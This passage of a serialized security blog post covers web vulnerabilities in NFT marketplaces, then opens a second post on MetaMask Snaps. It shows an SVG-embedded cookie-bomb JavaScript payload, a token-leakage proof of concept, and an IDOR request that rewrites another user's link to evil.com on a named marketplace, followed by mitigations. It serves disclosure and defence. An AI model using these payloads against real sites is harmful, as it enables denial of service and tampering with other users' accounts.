\u003C/svg>\n","jsx",[41215],{"type":24,"tag":145,"props":41216,"children":41217},{"__ignoreMap":7},[41218,41257,41288,41295,41322,41353,41380,41388,41396,41403,41415,41490,41497,41512],{"type":24,"tag":301,"props":41219,"children":41220},{"class":303,"line":304},[41221,41225,41229,41233,41237,41241,41245,41249,41253],{"type":24,"tag":301,"props":41222,"children":41223},{"style":385},[41224],{"type":30,"value":40928},{"type":24,"tag":301,"props":41226,"children":41227},{"style":369},[41228],{"type":30,"value":40933},{"type":24,"tag":301,"props":41230,"children":41231},{"style":369},[41232],{"type":30,"value":40938},{"type":24,"tag":301,"props":41234,"children":41235},{"style":385},[41236],{"type":30,"value":523},{"type":24,"tag":301,"props":41238,"children":41239},{"style":329},[41240],{"type":30,"value":40947},{"type":24,"tag":301,"props":41242,"children":41243},{"style":369},[41244],{"type":30,"value":40952},{"type":24,"tag":301,"props":41246,"children":41247},{"style":385},[41248],{"type":30,"value":523},{"type":24,"tag":301,"props":41250,"children":41251},{"style":329},[41252],{"type":30,"value":40961},{"type":24,"tag":301,"props":41254,"children":41255},{"style":385},[41256],{"type":30,"value":40966},{"type":24,"tag":301,"props":41258,"children":41259},{"class":303,"line":320},[41260,41264,41268,41272,41276,41280,41284],{"type":24,"tag":301,"props":41261,"children":41262},{"style":385},[41263],{"type":30,"value":40974},{"type":24,"tag":301,"props":41265,"children":41266},{"style":369},[41267],{"type":30,"value":40979},{"type":24,"tag":301,"props":41269,"children":41270},{"style":369},[41271],{"type":30,"value":40984},{"type":24,"tag":301,"props":41273,"children":41274},{"style":369},[41275],{"type":30,"value":40989},{"type":24,"tag":301,"props":41277,"children":41278},{"style":329},[41279],{"type":30,"value":40994},{"type":24,"tag":301,"props":41281,"children":41282},{"style":329},[41283],{"type":30,"value":40999},{"type":24,"tag":301,"props":41285,"children":41286},{"style":385},[41287],{"type":30,"value":12812},{"type":24,"tag":301,"props":41289,"children":41290},{"class":303,"line":335},[41291],{"type":24,"tag":301,"props":41292,"children":41293},{"emptyLinePlaceholder":16},[41294],{"type":30,"value":341},{"type":24,"tag":301,"props":41296,"children":41297},{"class":303,"line":344},[41298,41302,41306,41310,41314,41318],{"type":24,"tag":301,"props":41299,"children":41300},{"style":39126},[41301],{"type":30,"value":3950},{"type":24,"tag":301,"props":41303,"children":41304},{"style":348},[41305],{"type":30,"value":41022},{"type":24,"tag":301,"props":41307,"children":41308},{"style":369},[41309],{"type":30,"value":41027},{"type":24,"tag":301,"props":41311,"children":41312},{"style":385},[41313],{"type":30,"value":523},{"type":24,"tag":301,"props":41315,"children":41316},{"style":329},[41317],{"type":30,"value":41036},{"type":24,"tag":301,"props":41319,"children":41320},{"style":39126},[41321],{"type":30,"value":12812},{"type":24,"tag":301,"props":41323,"children":41324},{"class":303,"line":401},[41325,41329,41333,41337,41341,41345,41349],{"type":24,"tag":301,"props":41326,"children":41327},{"style":39126},[41328],{"type":30,"value":39145},{"type":24,"tag":301,"props":41330,"children":41331},{"style":348},[41332],{"type":30,"value":41052},{"type":24,"tag":301,"props":41334,"children":41335},{"style":39126},[41336],{"type":30,"value":1456},{"type":24,"tag":301,"props":41338,"children":41339},{"style":359},[41340],{"type":30,"value":37993},{"type":24,"tag":301,"props":41342,"children":41343},{"style":39126},[41344],{"type":30,"value":39180},{"type":24,"tag":301,"props":41346,"children":41347},{"style":348},[41348],{"type":30,"value":41052},{"type":24,"tag":301,"props":41350,"children":41351},{"style":39126},[41352],{"type":30,"value":12812},{"type":24,"tag":301,"props":41354,"children":41355},{"class":303,"line":415},[41356,41360,41364,41368,41372,41376],{"type":24,"tag":301,"props":41357,"children":41358},{"style":39126},[41359],{"type":30,"value":39145},{"type":24,"tag":301,"props":41361,"children":41362},{"style":348},[41363],{"type":30,"value":39166},{"type":24,"tag":301,"props":41365,"children":41366},{"style":369},[41367],{"type":30,"value":39291},{"type":24,"tag":301,"props":41369,"children":41370},{"style":385},[41371],{"type":30,"value":523},{"type":24,"tag":301,"props":41373,"children":41374},{"style":329},[41375],{"type":30,"value":41096},{"type":24,"tag":301,"props":41377,"children":41378},{"style":39126},[41379],{"type":30,"value":12812},{"type":24,"tag":301,"props":41381,"children":41382},{"class":303,"line":439},[41383],{"type":24,"tag":301,"props":41384,"children":41385},{"style":359},[41386],{"type":30,"value":41387}," var Take_Domain = window.location.hostname.split('.').slice(-2).join('.');\n",{"type":24,"tag":301,"props":41389,"children":41390},{"class":303,"line":447},[41391],{"type":24,"tag":301,"props":41392,"children":41393},{"style":359},[41394],{"type":30,"value":41395}," var Set_Cookie = Array(10000).join('a');\n",{"type":24,"tag":301,"props":41397,"children":41398},{"class":303,"line":476},[41399],{"type":24,"tag":301,"props":41400,"children":41401},{"emptyLinePlaceholder":16},[41402],{"type":30,"value":341},{"type":24,"tag":301,"props":41404,"children":41405},{"class":303,"line":495},[41406,41411],{"type":24,"tag":301,"props":41407,"children":41408},{"style":359},[41409],{"type":30,"value":41410}," for (var i = 1; i \u003C 99; i++) ",{"type":24,"tag":301,"props":41412,"children":41413},{"style":348},[41414],{"type":30,"value":799},{"type":24,"tag":301,"props":41416,"children":41417},{"class":303,"line":504},[41418,41423,41427,41432,41436,41441,41446,41450,41454,41459,41463,41468,41472,41477,41481,41486],{"type":24,"tag":301,"props":41419,"children":41420},{"style":369},[41421],{"type":30,"value":41422}," document",{"type":24,"tag":301,"props":41424,"children":41425},{"style":385},[41426],{"type":30,"value":206},{"type":24,"tag":301,"props":41428,"children":41429},{"style":369},[41430],{"type":30,"value":41431},"cookie",{"type":24,"tag":301,"props":41433,"children":41434},{"style":385},[41435],{"type":30,"value":39661},{"type":24,"tag":301,"props":41437,"children":41438},{"style":329},[41439],{"type":30,"value":41440},"'Cookie'",{"type":24,"tag":301,"props":41442,"children":41443},{"style":385},[41444],{"type":30,"value":41445}," + ",{"type":24,"tag":301,"props":41447,"children":41448},{"style":369},[41449],{"type":30,"value":10564},{"type":24,"tag":301,"props":41451,"children":41452},{"style":385},[41453],{"type":30,"value":41445},{"type":24,"tag":301,"props":41455,"children":41456},{"style":329},[41457],{"type":30,"value":41458},"'='",{"type":24,"tag":301,"props":41460,"children":41461},{"style":385},[41462],{"type":30,"value":41445},{"type":24,"tag":301,"props":41464,"children":41465},{"style":369},[41466],{"type":30,"value":41467},"Set_Cookie",{"type":24,"tag":301,"props":41469,"children":41470},{"style":385},[41471],{"type":30,"value":41445},{"type":24,"tag":301,"props":41473,"children":41474},{"style":329},[41475],{"type":30,"value":41476},"';Domain='",{"type":24,"tag":301,"props":41478,"children":41479},{"style":385},[41480],{"type":30,"value":41445},{"type":24,"tag":301,"props":41482,"children":41483},{"style":369},[41484],{"type":30,"value":41485},"Take_Domain",{"type":24,"tag":301,"props":41487,"children":41488},{"style":385},[41489],{"type":30,"value":492},{"type":24,"tag":301,"props":41491,"children":41492},{"class":303,"line":512},[41493],{"type":24,"tag":301,"props":41494,"children":41495},{"style":348},[41496],{"type":30,"value":1638},{"type":24,"tag":301,"props":41498,"children":41499},{"class":303,"line":592},[41500,41504,41508],{"type":24,"tag":301,"props":41501,"children":41502},{"style":39126},[41503],{"type":30,"value":41116},{"type":24,"tag":301,"props":41505,"children":41506},{"style":348},[41507],{"type":30,"value":39166},{"type":24,"tag":301,"props":41509,"children":41510},{"style":39126},[41511],{"type":30,"value":12812},{"type":24,"tag":301,"props":41513,"children":41514},{"class":303,"line":619},[41515,41519,41523],{"type":24,"tag":301,"props":41516,"children":41517},{"style":39126},[41518],{"type":30,"value":41132},{"type":24,"tag":301,"props":41520,"children":41521},{"style":348},[41522],{"type":30,"value":41022},{"type":24,"tag":301,"props":41524,"children":41525},{"style":39126},[41526],{"type":30,"value":12812},{"type":24,"tag":32,"props":41528,"children":41529},{},[41530],{"type":30,"value":41531},"As a result, we're able to prevent the user from loading images.",{"type":24,"tag":43,"props":41533,"children":41535},{"id":41534},"authentication",[41536],{"type":30,"value":41537},"Authentication",{"type":24,"tag":32,"props":41539,"children":41540},{},[41541],{"type":24,"tag":5422,"props":41542,"children":41543},{},[41544,41546,41553],{"type":30,"value":41545},"The door could not be heard slamming; they had probably left it open, as is the custom in homes where a ",{"type":24,"tag":188,"props":41547,"children":41550},{"href":41548,"rel":41549},"https://auth0.com/docs/get-started/identity-fundamentals/authentication-and-authorization",[192],[41551],{"type":30,"value":41552},"great misfortune has occured",{"type":30,"value":206},{"type":24,"tag":80,"props":41555,"children":41557},{"id":41556},"verification-token-leakage",[41558],{"type":30,"value":41559},"Verification Token Leakage",{"type":24,"tag":32,"props":41561,"children":41562},{},[41563],{"type":30,"value":41564},"When a user signs up for a service or creates an account that requires email verification, the system generates a unique token and sends it to the provided email address.",{"type":24,"tag":32,"props":41566,"children":41567},{},[41568],{"type":30,"value":41569},"This token is usually a random combination of letters, numbers, and symbols that are designed to be difficult to guess. The user is then instructed to verify their email by clicking a link that was sent to their inbox. However, if the email verification flow is not implemented correctly, it can result in security vulnerabilities.",{"type":24,"tag":32,"props":41571,"children":41572},{},[41573,41578],{"type":24,"tag":5422,"props":41574,"children":41575},{},[41576],{"type":30,"value":41577},"Proof of Concept",{"type":30,"value":41579},"\nWhile reviewing the Tensor website source code, we found a feature that allowed us to send verification emails to any email with a spoofed verification link. This could potentially result in the leakage of email verification codes, enabling an attacker to associate a victim’s email with their own account.",{"type":24,"tag":32,"props":41581,"children":41582},{},[41583],{"type":30,"value":41584},"Here's the breakdown.",{"type":24,"tag":32,"props":41586,"children":41587},{},[41588],{"type":30,"value":41589},"First, we send the verification link to a user's email:",{"type":24,"tag":38102,"props":41591,"children":41592},{"style":38104},[41593],{"type":24,"tag":177,"props":41594,"children":41598},{"src":41595,"alt":41596,"style":41597},"/posts/web2-bug-repellant-instructions/token-leakage.png","token-leakage","max-height:650px;",[],{"type":24,"tag":32,"props":41600,"children":41601},{},[41602],{"type":30,"value":41603},"If the user clicks on the spoofed URL, their token will be stolen, allowing the attacker to link their account to the victim’s email.",{"type":24,"tag":80,"props":41605,"children":41607},{"id":41606},"idor",[41608],{"type":30,"value":41609},"IDOR",{"type":24,"tag":32,"props":41611,"children":41612},{},[41613],{"type":24,"tag":5422,"props":41614,"children":41615},{},[41616,41618,41625],{"type":30,"value":41617},"As Gregor Samsa awoke one morning from uneasy dreams he found himself transformed in his bed into a gigantic ",{"type":24,"tag":188,"props":41619,"children":41622},{"href":41620,"rel":41621},"https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html",[192],[41623],{"type":30,"value":41624},"insect",{"type":30,"value":206},{"type":24,"tag":32,"props":41627,"children":41628},{},[41629,41631,41637],{"type":30,"value":41630},"During a security assessment of the ",{"type":24,"tag":188,"props":41632,"children":41635},{"href":41633,"rel":41634},"https://rocki.com",[192],[41636],{"type":30,"value":38040},{"type":30,"value":41638},", a critical vulnerability known as an Insecure Direct Object Reference (IDOR) was identified within the social link modification functionality. Exploiting this vulnerability enables an attacker to modify the social media links of other users without proper authorization.",{"type":24,"tag":32,"props":41640,"children":41641},{},[41642],{"type":30,"value":41643},"The specific vulnerable endpoint was identified as a POST request to /api/user/modifySocialLink, which is responsible for handling requests to update social media links associated with user accounts. This endpoint requires two parameters: \"newLink\" to specify the desired social media link and \"id\" to indicate the user's ID.",{"type":24,"tag":32,"props":41645,"children":41646},{},[41647],{"type":30,"value":41648},"Now, to exploit this vulnerability, an attacker can intercept or modify the request being sent to the \"POST /api/user/modifySocialLink\" endpoint. By manipulating the \"id\" parameter with the user ID of another user, the attacker is able to bypass proper authorization checks and modify the social media link associated with the targeted user's account.",{"type":24,"tag":32,"props":41650,"children":41651},{},[41652,41654,41660,41662,41667],{"type":30,"value":41653},"Here is an example of a request that modifies another user's social media link to ",{"type":24,"tag":145,"props":41655,"children":41657},{"className":41656},[],[41658],{"type":30,"value":41659},"https://evil.com/",{"type":30,"value":41661},". To achieve this, we simply changed the ",{"type":24,"tag":145,"props":41663,"children":41665},{"className":41664},[],[41666],{"type":30,"value":10313},{"type":30,"value":41668}," field value to one that belongs to another user:",{"type":24,"tag":32,"props":41670,"children":41671},{},[41672],{"type":24,"tag":177,"props":41673,"children":41675},{"alt":7,"src":41674},"/posts/web2-bug-repellant-instructions/idor-1.png",[],{"type":24,"tag":32,"props":41677,"children":41678},{},[41679],{"type":30,"value":41680},"The following screenshot is the response to our request:",{"type":24,"tag":32,"props":41682,"children":41683},{},[41684],{"type":24,"tag":177,"props":41685,"children":41687},{"alt":7,"src":41686},"/posts/web2-bug-repellant-instructions/idor-2.png",[],{"type":24,"tag":43,"props":41689,"children":41691},{"id":41690},"preventative-action-steps-for-marketplaces",[41692],{"type":24,"tag":60,"props":41693,"children":41694},{},[41695],{"type":30,"value":41696},"Preventative Action Steps for Marketplaces",{"type":24,"tag":32,"props":41698,"children":41699},{},[41700],{"type":30,"value":41701},"To mitigate the vulnerabilities we’ve discussed, NFT marketplaces must prioritize the implementation of robust security measures. Below, we outline potential mitigations that can help platforms enhance their security posture and protect users and their valuable digital assets.",{"type":24,"tag":32,"props":41703,"children":41704},{},[41705,41707,41713,41715,41721],{"type":30,"value":41706},"First and foremost, NFT marketplaces should prioritize security by strengthening their input validation and output encoding processes. This can be done by encoding untrusted data with HTML entities in backend or using ",{"type":24,"tag":145,"props":41708,"children":41710},{"className":41709},[],[41711],{"type":30,"value":41712},"innerText",{"type":30,"value":41714}," instead of ",{"type":24,"tag":145,"props":41716,"children":41718},{"className":41717},[],[41719],{"type":30,"value":41720},"innerHTML",{"type":30,"value":41722}," in client-side:",{"type":24,"tag":291,"props":41724,"children":41726},{"className":38119,"code":41725,"language":38121,"meta":7,"style":7},"document.getElementById('nftCollectionName').innerText = nftCollectionName;\n",[41727],{"type":24,"tag":145,"props":41728,"children":41729},{"__ignoreMap":7},[41730],{"type":24,"tag":301,"props":41731,"children":41732},{"class":303,"line":304},[41733,41737,41741,41746,41750,41755,41759,41763,41767,41772],{"type":24,"tag":301,"props":41734,"children":41735},{"style":369},[41736],{"type":30,"value":39458},{"type":24,"tag":301,"props":41738,"children":41739},{"style":359},[41740],{"type":30,"value":206},{"type":24,"tag":301,"props":41742,"children":41743},{"style":314},[41744],{"type":30,"value":41745},"getElementById",{"type":24,"tag":301,"props":41747,"children":41748},{"style":359},[41749],{"type":30,"value":362},{"type":24,"tag":301,"props":41751,"children":41752},{"style":329},[41753],{"type":30,"value":41754},"'nftCollectionName'",{"type":24,"tag":301,"props":41756,"children":41757},{"style":359},[41758],{"type":30,"value":27511},{"type":24,"tag":301,"props":41760,"children":41761},{"style":369},[41762],{"type":30,"value":41712},{"type":24,"tag":301,"props":41764,"children":41765},{"style":385},[41766],{"type":30,"value":2537},{"type":24,"tag":301,"props":41768,"children":41769},{"style":369},[41770],{"type":30,"value":41771}," nftCollectionName",{"type":24,"tag":301,"props":41773,"children":41774},{"style":359},[41775],{"type":30,"value":492},{"type":24,"tag":32,"props":41777,"children":41778},{},[41779],{"type":30,"value":41780},"However, rendering HTML or markdown user input is intended. In these cases, dangerous HTML tags need to be validated and sanitized via consolidated libraries like DomPurify:",{"type":24,"tag":291,"props":41782,"children":41784},{"className":38119,"code":41783,"language":38121,"meta":7,"style":7},"var sanitizedInput = DOMPurify.sanitize(userInput);\n",[41785],{"type":24,"tag":145,"props":41786,"children":41787},{"__ignoreMap":7},[41788],{"type":24,"tag":301,"props":41789,"children":41790},{"class":303,"line":304},[41791,41796,41801,41805,41810,41814,41819,41823,41828],{"type":24,"tag":301,"props":41792,"children":41793},{"style":348},[41794],{"type":30,"value":41795},"var",{"type":24,"tag":301,"props":41797,"children":41798},{"style":369},[41799],{"type":30,"value":41800}," sanitizedInput",{"type":24,"tag":301,"props":41802,"children":41803},{"style":385},[41804],{"type":30,"value":2537},{"type":24,"tag":301,"props":41806,"children":41807},{"style":369},[41808],{"type":30,"value":41809}," DOMPurify",{"type":24,"tag":301,"props":41811,"children":41812},{"style":359},[41813],{"type":30,"value":206},{"type":24,"tag":301,"props":41815,"children":41816},{"style":314},[41817],{"type":30,"value":41818},"sanitize",{"type":24,"tag":301,"props":41820,"children":41821},{"style":359},[41822],{"type":30,"value":362},{"type":24,"tag":301,"props":41824,"children":41825},{"style":369},[41826],{"type":30,"value":41827},"userInput",{"type":24,"tag":301,"props":41829,"children":41830},{"style":359},[41831],{"type":30,"value":589},{"type":24,"tag":32,"props":41833,"children":41834},{},[41835,41837,41844],{"type":30,"value":41836},"This can effectively mitigate the risk of XSS attacks. With that being said, implementing security measures such as ",{"type":24,"tag":188,"props":41838,"children":41841},{"href":41839,"rel":41840},"https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP",[192],[41842],{"type":30,"value":41843},"Content-Security-Policy",{"type":30,"value":41845}," (CSP) will help ensure that generated content is rendered safely, without compromising the platform's security.",{"type":24,"tag":32,"props":41847,"children":41848},{},[41849],{"type":30,"value":41850},"Furthermore, a key step is for NFT marketplaces to establish strict file upload policies. By conducting thorough checks on file types and content, platforms can prevent the upload of potentially malicious SVG files. Validating both the file extension and content type will significantly reduce the risk of SVG-based XSS attacks, ensuring a safer user experience.",{"type":24,"tag":32,"props":41852,"children":41853},{},[41854,41856,41863],{"type":30,"value":41855},"Another precaution is to implement secure redirect mechanisms. By implementing a server-side allow-list of trusted domains, NFT marketplaces can prevent open redirect vulnerabilities. This ensures that users are directed only to trusted and intended domains, safeguarding them from potential phishing or malicious attacks where the authentication code is leaked. Here we are showing an example of a secure redirect by applying an ",{"type":24,"tag":188,"props":41857,"children":41860},{"href":41858,"rel":41859},"https://www.techtarget.com/whatis/definition/whitelist",[192],[41861],{"type":30,"value":41862},"allow-list",{"type":30,"value":2012},{"type":24,"tag":291,"props":41865,"children":41867},{"className":38119,"code":41866,"language":38121,"meta":7,"style":7},"const allowDomains = ['https://allowed-domain'];\nif (!allowDomains.includes(domain)) {\n throw new ApolloError('invalid domain');\n}\n",[41868],{"type":24,"tag":145,"props":41869,"children":41870},{"__ignoreMap":7},[41871,41900,41942,41972],{"type":24,"tag":301,"props":41872,"children":41873},{"class":303,"line":304},[41874,41878,41883,41887,41891,41896],{"type":24,"tag":301,"props":41875,"children":41876},{"style":348},[41877],{"type":30,"value":16460},{"type":24,"tag":301,"props":41879,"children":41880},{"style":369},[41881],{"type":30,"value":41882}," allowDomains",{"type":24,"tag":301,"props":41884,"children":41885},{"style":385},[41886],{"type":30,"value":2537},{"type":24,"tag":301,"props":41888,"children":41889},{"style":359},[41890],{"type":30,"value":29800},{"type":24,"tag":301,"props":41892,"children":41893},{"style":329},[41894],{"type":30,"value":41895},"'https://allowed-domain'",{"type":24,"tag":301,"props":41897,"children":41898},{"style":359},[41899],{"type":30,"value":1423},{"type":24,"tag":301,"props":41901,"children":41902},{"class":303,"line":320},[41903,41907,41911,41915,41920,41924,41929,41933,41937],{"type":24,"tag":301,"props":41904,"children":41905},{"style":308},[41906],{"type":30,"value":22368},{"type":24,"tag":301,"props":41908,"children":41909},{"style":359},[41910],{"type":30,"value":873},{"type":24,"tag":301,"props":41912,"children":41913},{"style":385},[41914],{"type":30,"value":2485},{"type":24,"tag":301,"props":41916,"children":41917},{"style":369},[41918],{"type":30,"value":41919},"allowDomains",{"type":24,"tag":301,"props":41921,"children":41922},{"style":359},[41923],{"type":30,"value":206},{"type":24,"tag":301,"props":41925,"children":41926},{"style":314},[41927],{"type":30,"value":41928},"includes",{"type":24,"tag":301,"props":41930,"children":41931},{"style":359},[41932],{"type":30,"value":362},{"type":24,"tag":301,"props":41934,"children":41935},{"style":369},[41936],{"type":30,"value":39468},{"type":24,"tag":301,"props":41938,"children":41939},{"style":359},[41940],{"type":30,"value":41941},")) {\n",{"type":24,"tag":301,"props":41943,"children":41944},{"class":303,"line":335},[41945,41950,41954,41959,41963,41968],{"type":24,"tag":301,"props":41946,"children":41947},{"style":308},[41948],{"type":30,"value":41949}," throw",{"type":24,"tag":301,"props":41951,"children":41952},{"style":348},[41953],{"type":30,"value":38685},{"type":24,"tag":301,"props":41955,"children":41956},{"style":314},[41957],{"type":30,"value":41958}," ApolloError",{"type":24,"tag":301,"props":41960,"children":41961},{"style":359},[41962],{"type":30,"value":362},{"type":24,"tag":301,"props":41964,"children":41965},{"style":329},[41966],{"type":30,"value":41967},"'invalid domain'",{"type":24,"tag":301,"props":41969,"children":41970},{"style":359},[41971],{"type":30,"value":589},{"type":24,"tag":301,"props":41973,"children":41974},{"class":303,"line":344},[41975],{"type":24,"tag":301,"props":41976,"children":41977},{"style":359},[41978],{"type":30,"value":698},{"type":24,"tag":32,"props":41980,"children":41981},{},[41982,41984,41991,41993,42000],{"type":30,"value":41983},"As ",{"type":24,"tag":188,"props":41985,"children":41988},{"href":41986,"rel":41987},"https://graphql.org/",[192],[41989],{"type":30,"value":41990},"GraphQl",{"type":30,"value":41992}," is widely utilized by NFT marketplaces, it is crucial to understand the reasons behind disabling certain features like ",{"type":24,"tag":188,"props":41994,"children":41997},{"href":41995,"rel":41996},"https://graphql.org/learn/introspection/",[192],[41998],{"type":30,"value":41999},"introspection",{"type":30,"value":42001}," in production environments. By disabling introspection, it ensures that clients are unable to query the API's schema, preventing the potential exposure of sensitive information regarding its structure and implementation. Below, we provide an example of how to achieve this using the Apollo server:",{"type":24,"tag":291,"props":42003,"children":42005},{"className":38119,"code":42004,"language":38121,"meta":7,"style":7},"const server = new ApolloServer({\n typeDefs,\n resolvers,\n introspection: false,\n});\n",[42006],{"type":24,"tag":145,"props":42007,"children":42008},{"__ignoreMap":7},[42009,42038,42050,42062,42078],{"type":24,"tag":301,"props":42010,"children":42011},{"class":303,"line":304},[42012,42016,42021,42025,42029,42034],{"type":24,"tag":301,"props":42013,"children":42014},{"style":348},[42015],{"type":30,"value":16460},{"type":24,"tag":301,"props":42017,"children":42018},{"style":369},[42019],{"type":30,"value":42020}," server",{"type":24,"tag":301,"props":42022,"children":42023},{"style":385},[42024],{"type":30,"value":2537},{"type":24,"tag":301,"props":42026,"children":42027},{"style":348},[42028],{"type":30,"value":38685},{"type":24,"tag":301,"props":42030,"children":42031},{"style":314},[42032],{"type":30,"value":42033}," ApolloServer",{"type":24,"tag":301,"props":42035,"children":42036},{"style":359},[42037],{"type":30,"value":4304},{"type":24,"tag":301,"props":42039,"children":42040},{"class":303,"line":320},[42041,42046],{"type":24,"tag":301,"props":42042,"children":42043},{"style":369},[42044],{"type":30,"value":42045}," typeDefs",{"type":24,"tag":301,"props":42047,"children":42048},{"style":359},[42049],{"type":30,"value":1729},{"type":24,"tag":301,"props":42051,"children":42052},{"class":303,"line":335},[42053,42058],{"type":24,"tag":301,"props":42054,"children":42055},{"style":369},[42056],{"type":30,"value":42057}," resolvers",{"type":24,"tag":301,"props":42059,"children":42060},{"style":359},[42061],{"type":30,"value":1729},{"type":24,"tag":301,"props":42063,"children":42064},{"class":303,"line":344},[42065,42070,42074],{"type":24,"tag":301,"props":42066,"children":42067},{"style":369},[42068],{"type":30,"value":42069}," introspection:",{"type":24,"tag":301,"props":42071,"children":42072},{"style":348},[42073],{"type":30,"value":3613},{"type":24,"tag":301,"props":42075,"children":42076},{"style":359},[42077],{"type":30,"value":1729},{"type":24,"tag":301,"props":42079,"children":42080},{"class":303,"line":401},[42081],{"type":24,"tag":301,"props":42082,"children":42083},{"style":359},[42084],{"type":30,"value":4868},{"type":24,"tag":32,"props":42086,"children":42087},{},[42088,42090,42097,42099,42106],{"type":30,"value":42089},"Similarly, when ",{"type":24,"tag":188,"props":42091,"children":42094},{"href":42092,"rel":42093},"https://www.apollographql.com/blog/apollo-client/performance/batching-client-graphql-queries/",[192],[42095],{"type":30,"value":42096},"batching",{"type":30,"value":42098}," is enabled, the code should limit the number of queries that can run simultaneously and implement object request rate limiting. This additional measure helps protect the website from potential ",{"type":24,"tag":188,"props":42100,"children":42103},{"href":42101,"rel":42102},"https://en.wikipedia.org/wiki/Denial-of-service_attack",[192],[42104],{"type":30,"value":42105},"denial-of-service",{"type":30,"value":42107}," (DoS) attacks.",{"type":24,"tag":32,"props":42109,"children":42110},{},[42111],{"type":30,"value":42112},"Lastly, NFT marketplaces should pay close attention to authentication and authorization controls. Specifically, addressing third-party platform misconfiguration. Applying the least privilege principle is crucial for enhancing security.",{"type":24,"tag":32,"props":42114,"children":42115},{},[42116],{"type":30,"value":42117},"By implementing these security measures, NFT marketplaces can strengthen their security posture, build trust among users, and create a secure environment for the trading and exchange of valuable digital assets.",{"type":24,"tag":25,"props":42119,"children":42120},{"id":9652},[42121],{"type":30,"value":9655},{"type":24,"tag":32,"props":42123,"children":42124},{},[42125],{"type":30,"value":42126},"To recap, the presence of Web 2 bugs in NFT marketplaces emphasizes the need to address the underlying security issues within these platforms. Developers must prioritize not only the integrity of on-chain operations, but also the security of off-chain processes. To ensure an overall robust and trustworthy ecosystem for NFT marketplaces, developers should focus on implementing comprehensive security measures across all the components of the marketplace, engage with third party auditor, and test the entire infrastructure as necessary to identify and address any potential vulnerabilities.",{"type":24,"tag":32,"props":42128,"children":42129},{},[42130],{"type":30,"value":42131},"Most of all, it is especially crucial to educate communities about risks and security best practices. By promoting awareness and providing transparent information, platforms can empower users to make informed decisions and protect themselves against potential scams or fraudulent activities.",{"type":24,"tag":43,"props":42133,"children":42135},{"id":42134},"disclaimer",[42136],{"type":30,"value":42137},"Disclaimer",{"type":24,"tag":32,"props":42139,"children":42140},{},[42141],{"type":30,"value":42142},"Despite our consistent efforts to contact the Rocki Marketplace team regarding our findings, we unfortunately have not received a response. As a result, we decided to disclose this matter to our readers. We will continue to closely monitor the situation and remain open in helping their team resolve this issue.",{"type":24,"tag":9672,"props":42144,"children":42145},{},[42146],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":42148},[42149,42152,42158,42162,42163],{"id":35771,"depth":320,"text":35774,"children":42150},[42151],{"id":9755,"depth":335,"text":9758},{"id":37963,"depth":320,"text":37993,"children":42153},[42154,42155,42156,42157],{"id":38012,"depth":335,"text":38015},{"id":38077,"depth":335,"text":38080},{"id":40900,"depth":335,"text":40903},{"id":41190,"depth":335,"text":41193},{"id":41534,"depth":320,"text":41537,"children":42159},[42160,42161],{"id":41556,"depth":335,"text":41559},{"id":41606,"depth":335,"text":41609},{"id":41690,"depth":320,"text":41696},{"id":42134,"depth":320,"text":42137},"content:blog:2023-08-11-web2-bug-repellant-instructions.md","blog/2023-08-11-web2-bug-repellant-instructions.md","blog/2023-08-11-web2-bug-repellant-instructions",{"_path":42168,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":42169,"description":42170,"author":42171,"image":42172,"date":42174,"isFeatured":16,"onBlogPage":16,"body":42175,"_type":9700,"_id":47180,"_source":9702,"_file":47181,"_stem":47182,"_extension":9705},"/blog/2023-11-01-metamask-snaps","Metamask Snaps: Playing in the Sand","A deep dig into Metamask Snaps. We explore safety considerations, environment design, and break down a property spoofing vulnerability in the Snaps sandboxing layer.",[37957,37956],{"src":42173,"height":20417,"width":15},"/posts/metamask-snaps/header.png","2023-11-01",{"type":21,"children":42176,"toc":47161},[42177,42181,42186,42191,42196,42202,42207,42213,42226,42231,42236,42243,42275,42281,42286,42304,42311,42317,42331,42337,42357,42619,42647,42653,42672,43056,43075,43088,43406,43427,43698,43703,43709,43714,43727,43732,43745,44002,44046,44059,44065,44079,44085,44091,44104,44141,44147,44167,44277,44304,44310,44328,44341,44347,44352,44370,44481,44486,44507,44520,44537,44637,44663,44680,44802,44828,44840,44845,44851,44857,44862,44885,44890,44895,44901,44907,44934,45337,45364,45391,45397,45428,45736,45755,45760,45785,45798,45804,45831,46123,46159,46177,46182,46217,46222,46226,46231,46238,46243,46270,47047,47067,47073,47094,47143,47147,47152,47157],{"type":24,"tag":43,"props":42178,"children":42179},{"id":25732},[42180],{"type":30,"value":25735},{"type":24,"tag":32,"props":42182,"children":42183},{},[42184],{"type":30,"value":42185},"Metamask snaps are simple modules that extend Metamask's functionality. These modules can be written by anyone, and provide useful features that the vanilla wallet doesn't.",{"type":24,"tag":32,"props":42187,"children":42188},{},[42189],{"type":30,"value":42190},"Metamask provides a sandboxed environment that allows developers to run Snap code safely, without disclosing or tampering with critical information without user permission.",{"type":24,"tag":32,"props":42192,"children":42193},{},[42194],{"type":30,"value":42195},"In this article, we'll explore exactly how the snap execution environment works. We'll then delve into a unique property spoofing vulnerability we reported in the Metamask Snaps sandbox.",{"type":24,"tag":43,"props":42197,"children":42199},{"id":42198},"sandbox-security",[42200],{"type":30,"value":42201},"Sandbox Security",{"type":24,"tag":32,"props":42203,"children":42204},{},[42205],{"type":30,"value":42206},"In the first part of the article, we'll describe how the Metamask sandbox works, and examine what it's doing to protect the security of Snaps.",{"type":24,"tag":80,"props":42208,"children":42210},{"id":42209},"permission-based-security",[42211],{"type":30,"value":42212},"Permission-based security",{"type":24,"tag":32,"props":42214,"children":42215},{},[42216,42218,42224],{"type":30,"value":42217},"Each snap is built to have only the permissions it needs to hold. These permissions are specified in the ",{"type":24,"tag":145,"props":42219,"children":42221},{"className":42220},[],[42222],{"type":30,"value":42223},"snap.manifest.json",{"type":30,"value":42225}," file and can be critical to security.",{"type":24,"tag":32,"props":42227,"children":42228},{},[42229],{"type":30,"value":42230},"Snap security is totally centered around the user, whose decisions can provide dangerous permissions to a malicious snap. Metamask warns about the risk of each permission.",{"type":24,"tag":32,"props":42232,"children":42233},{},[42234],{"type":30,"value":42235},"Here are the critical permissions possible to be given to a 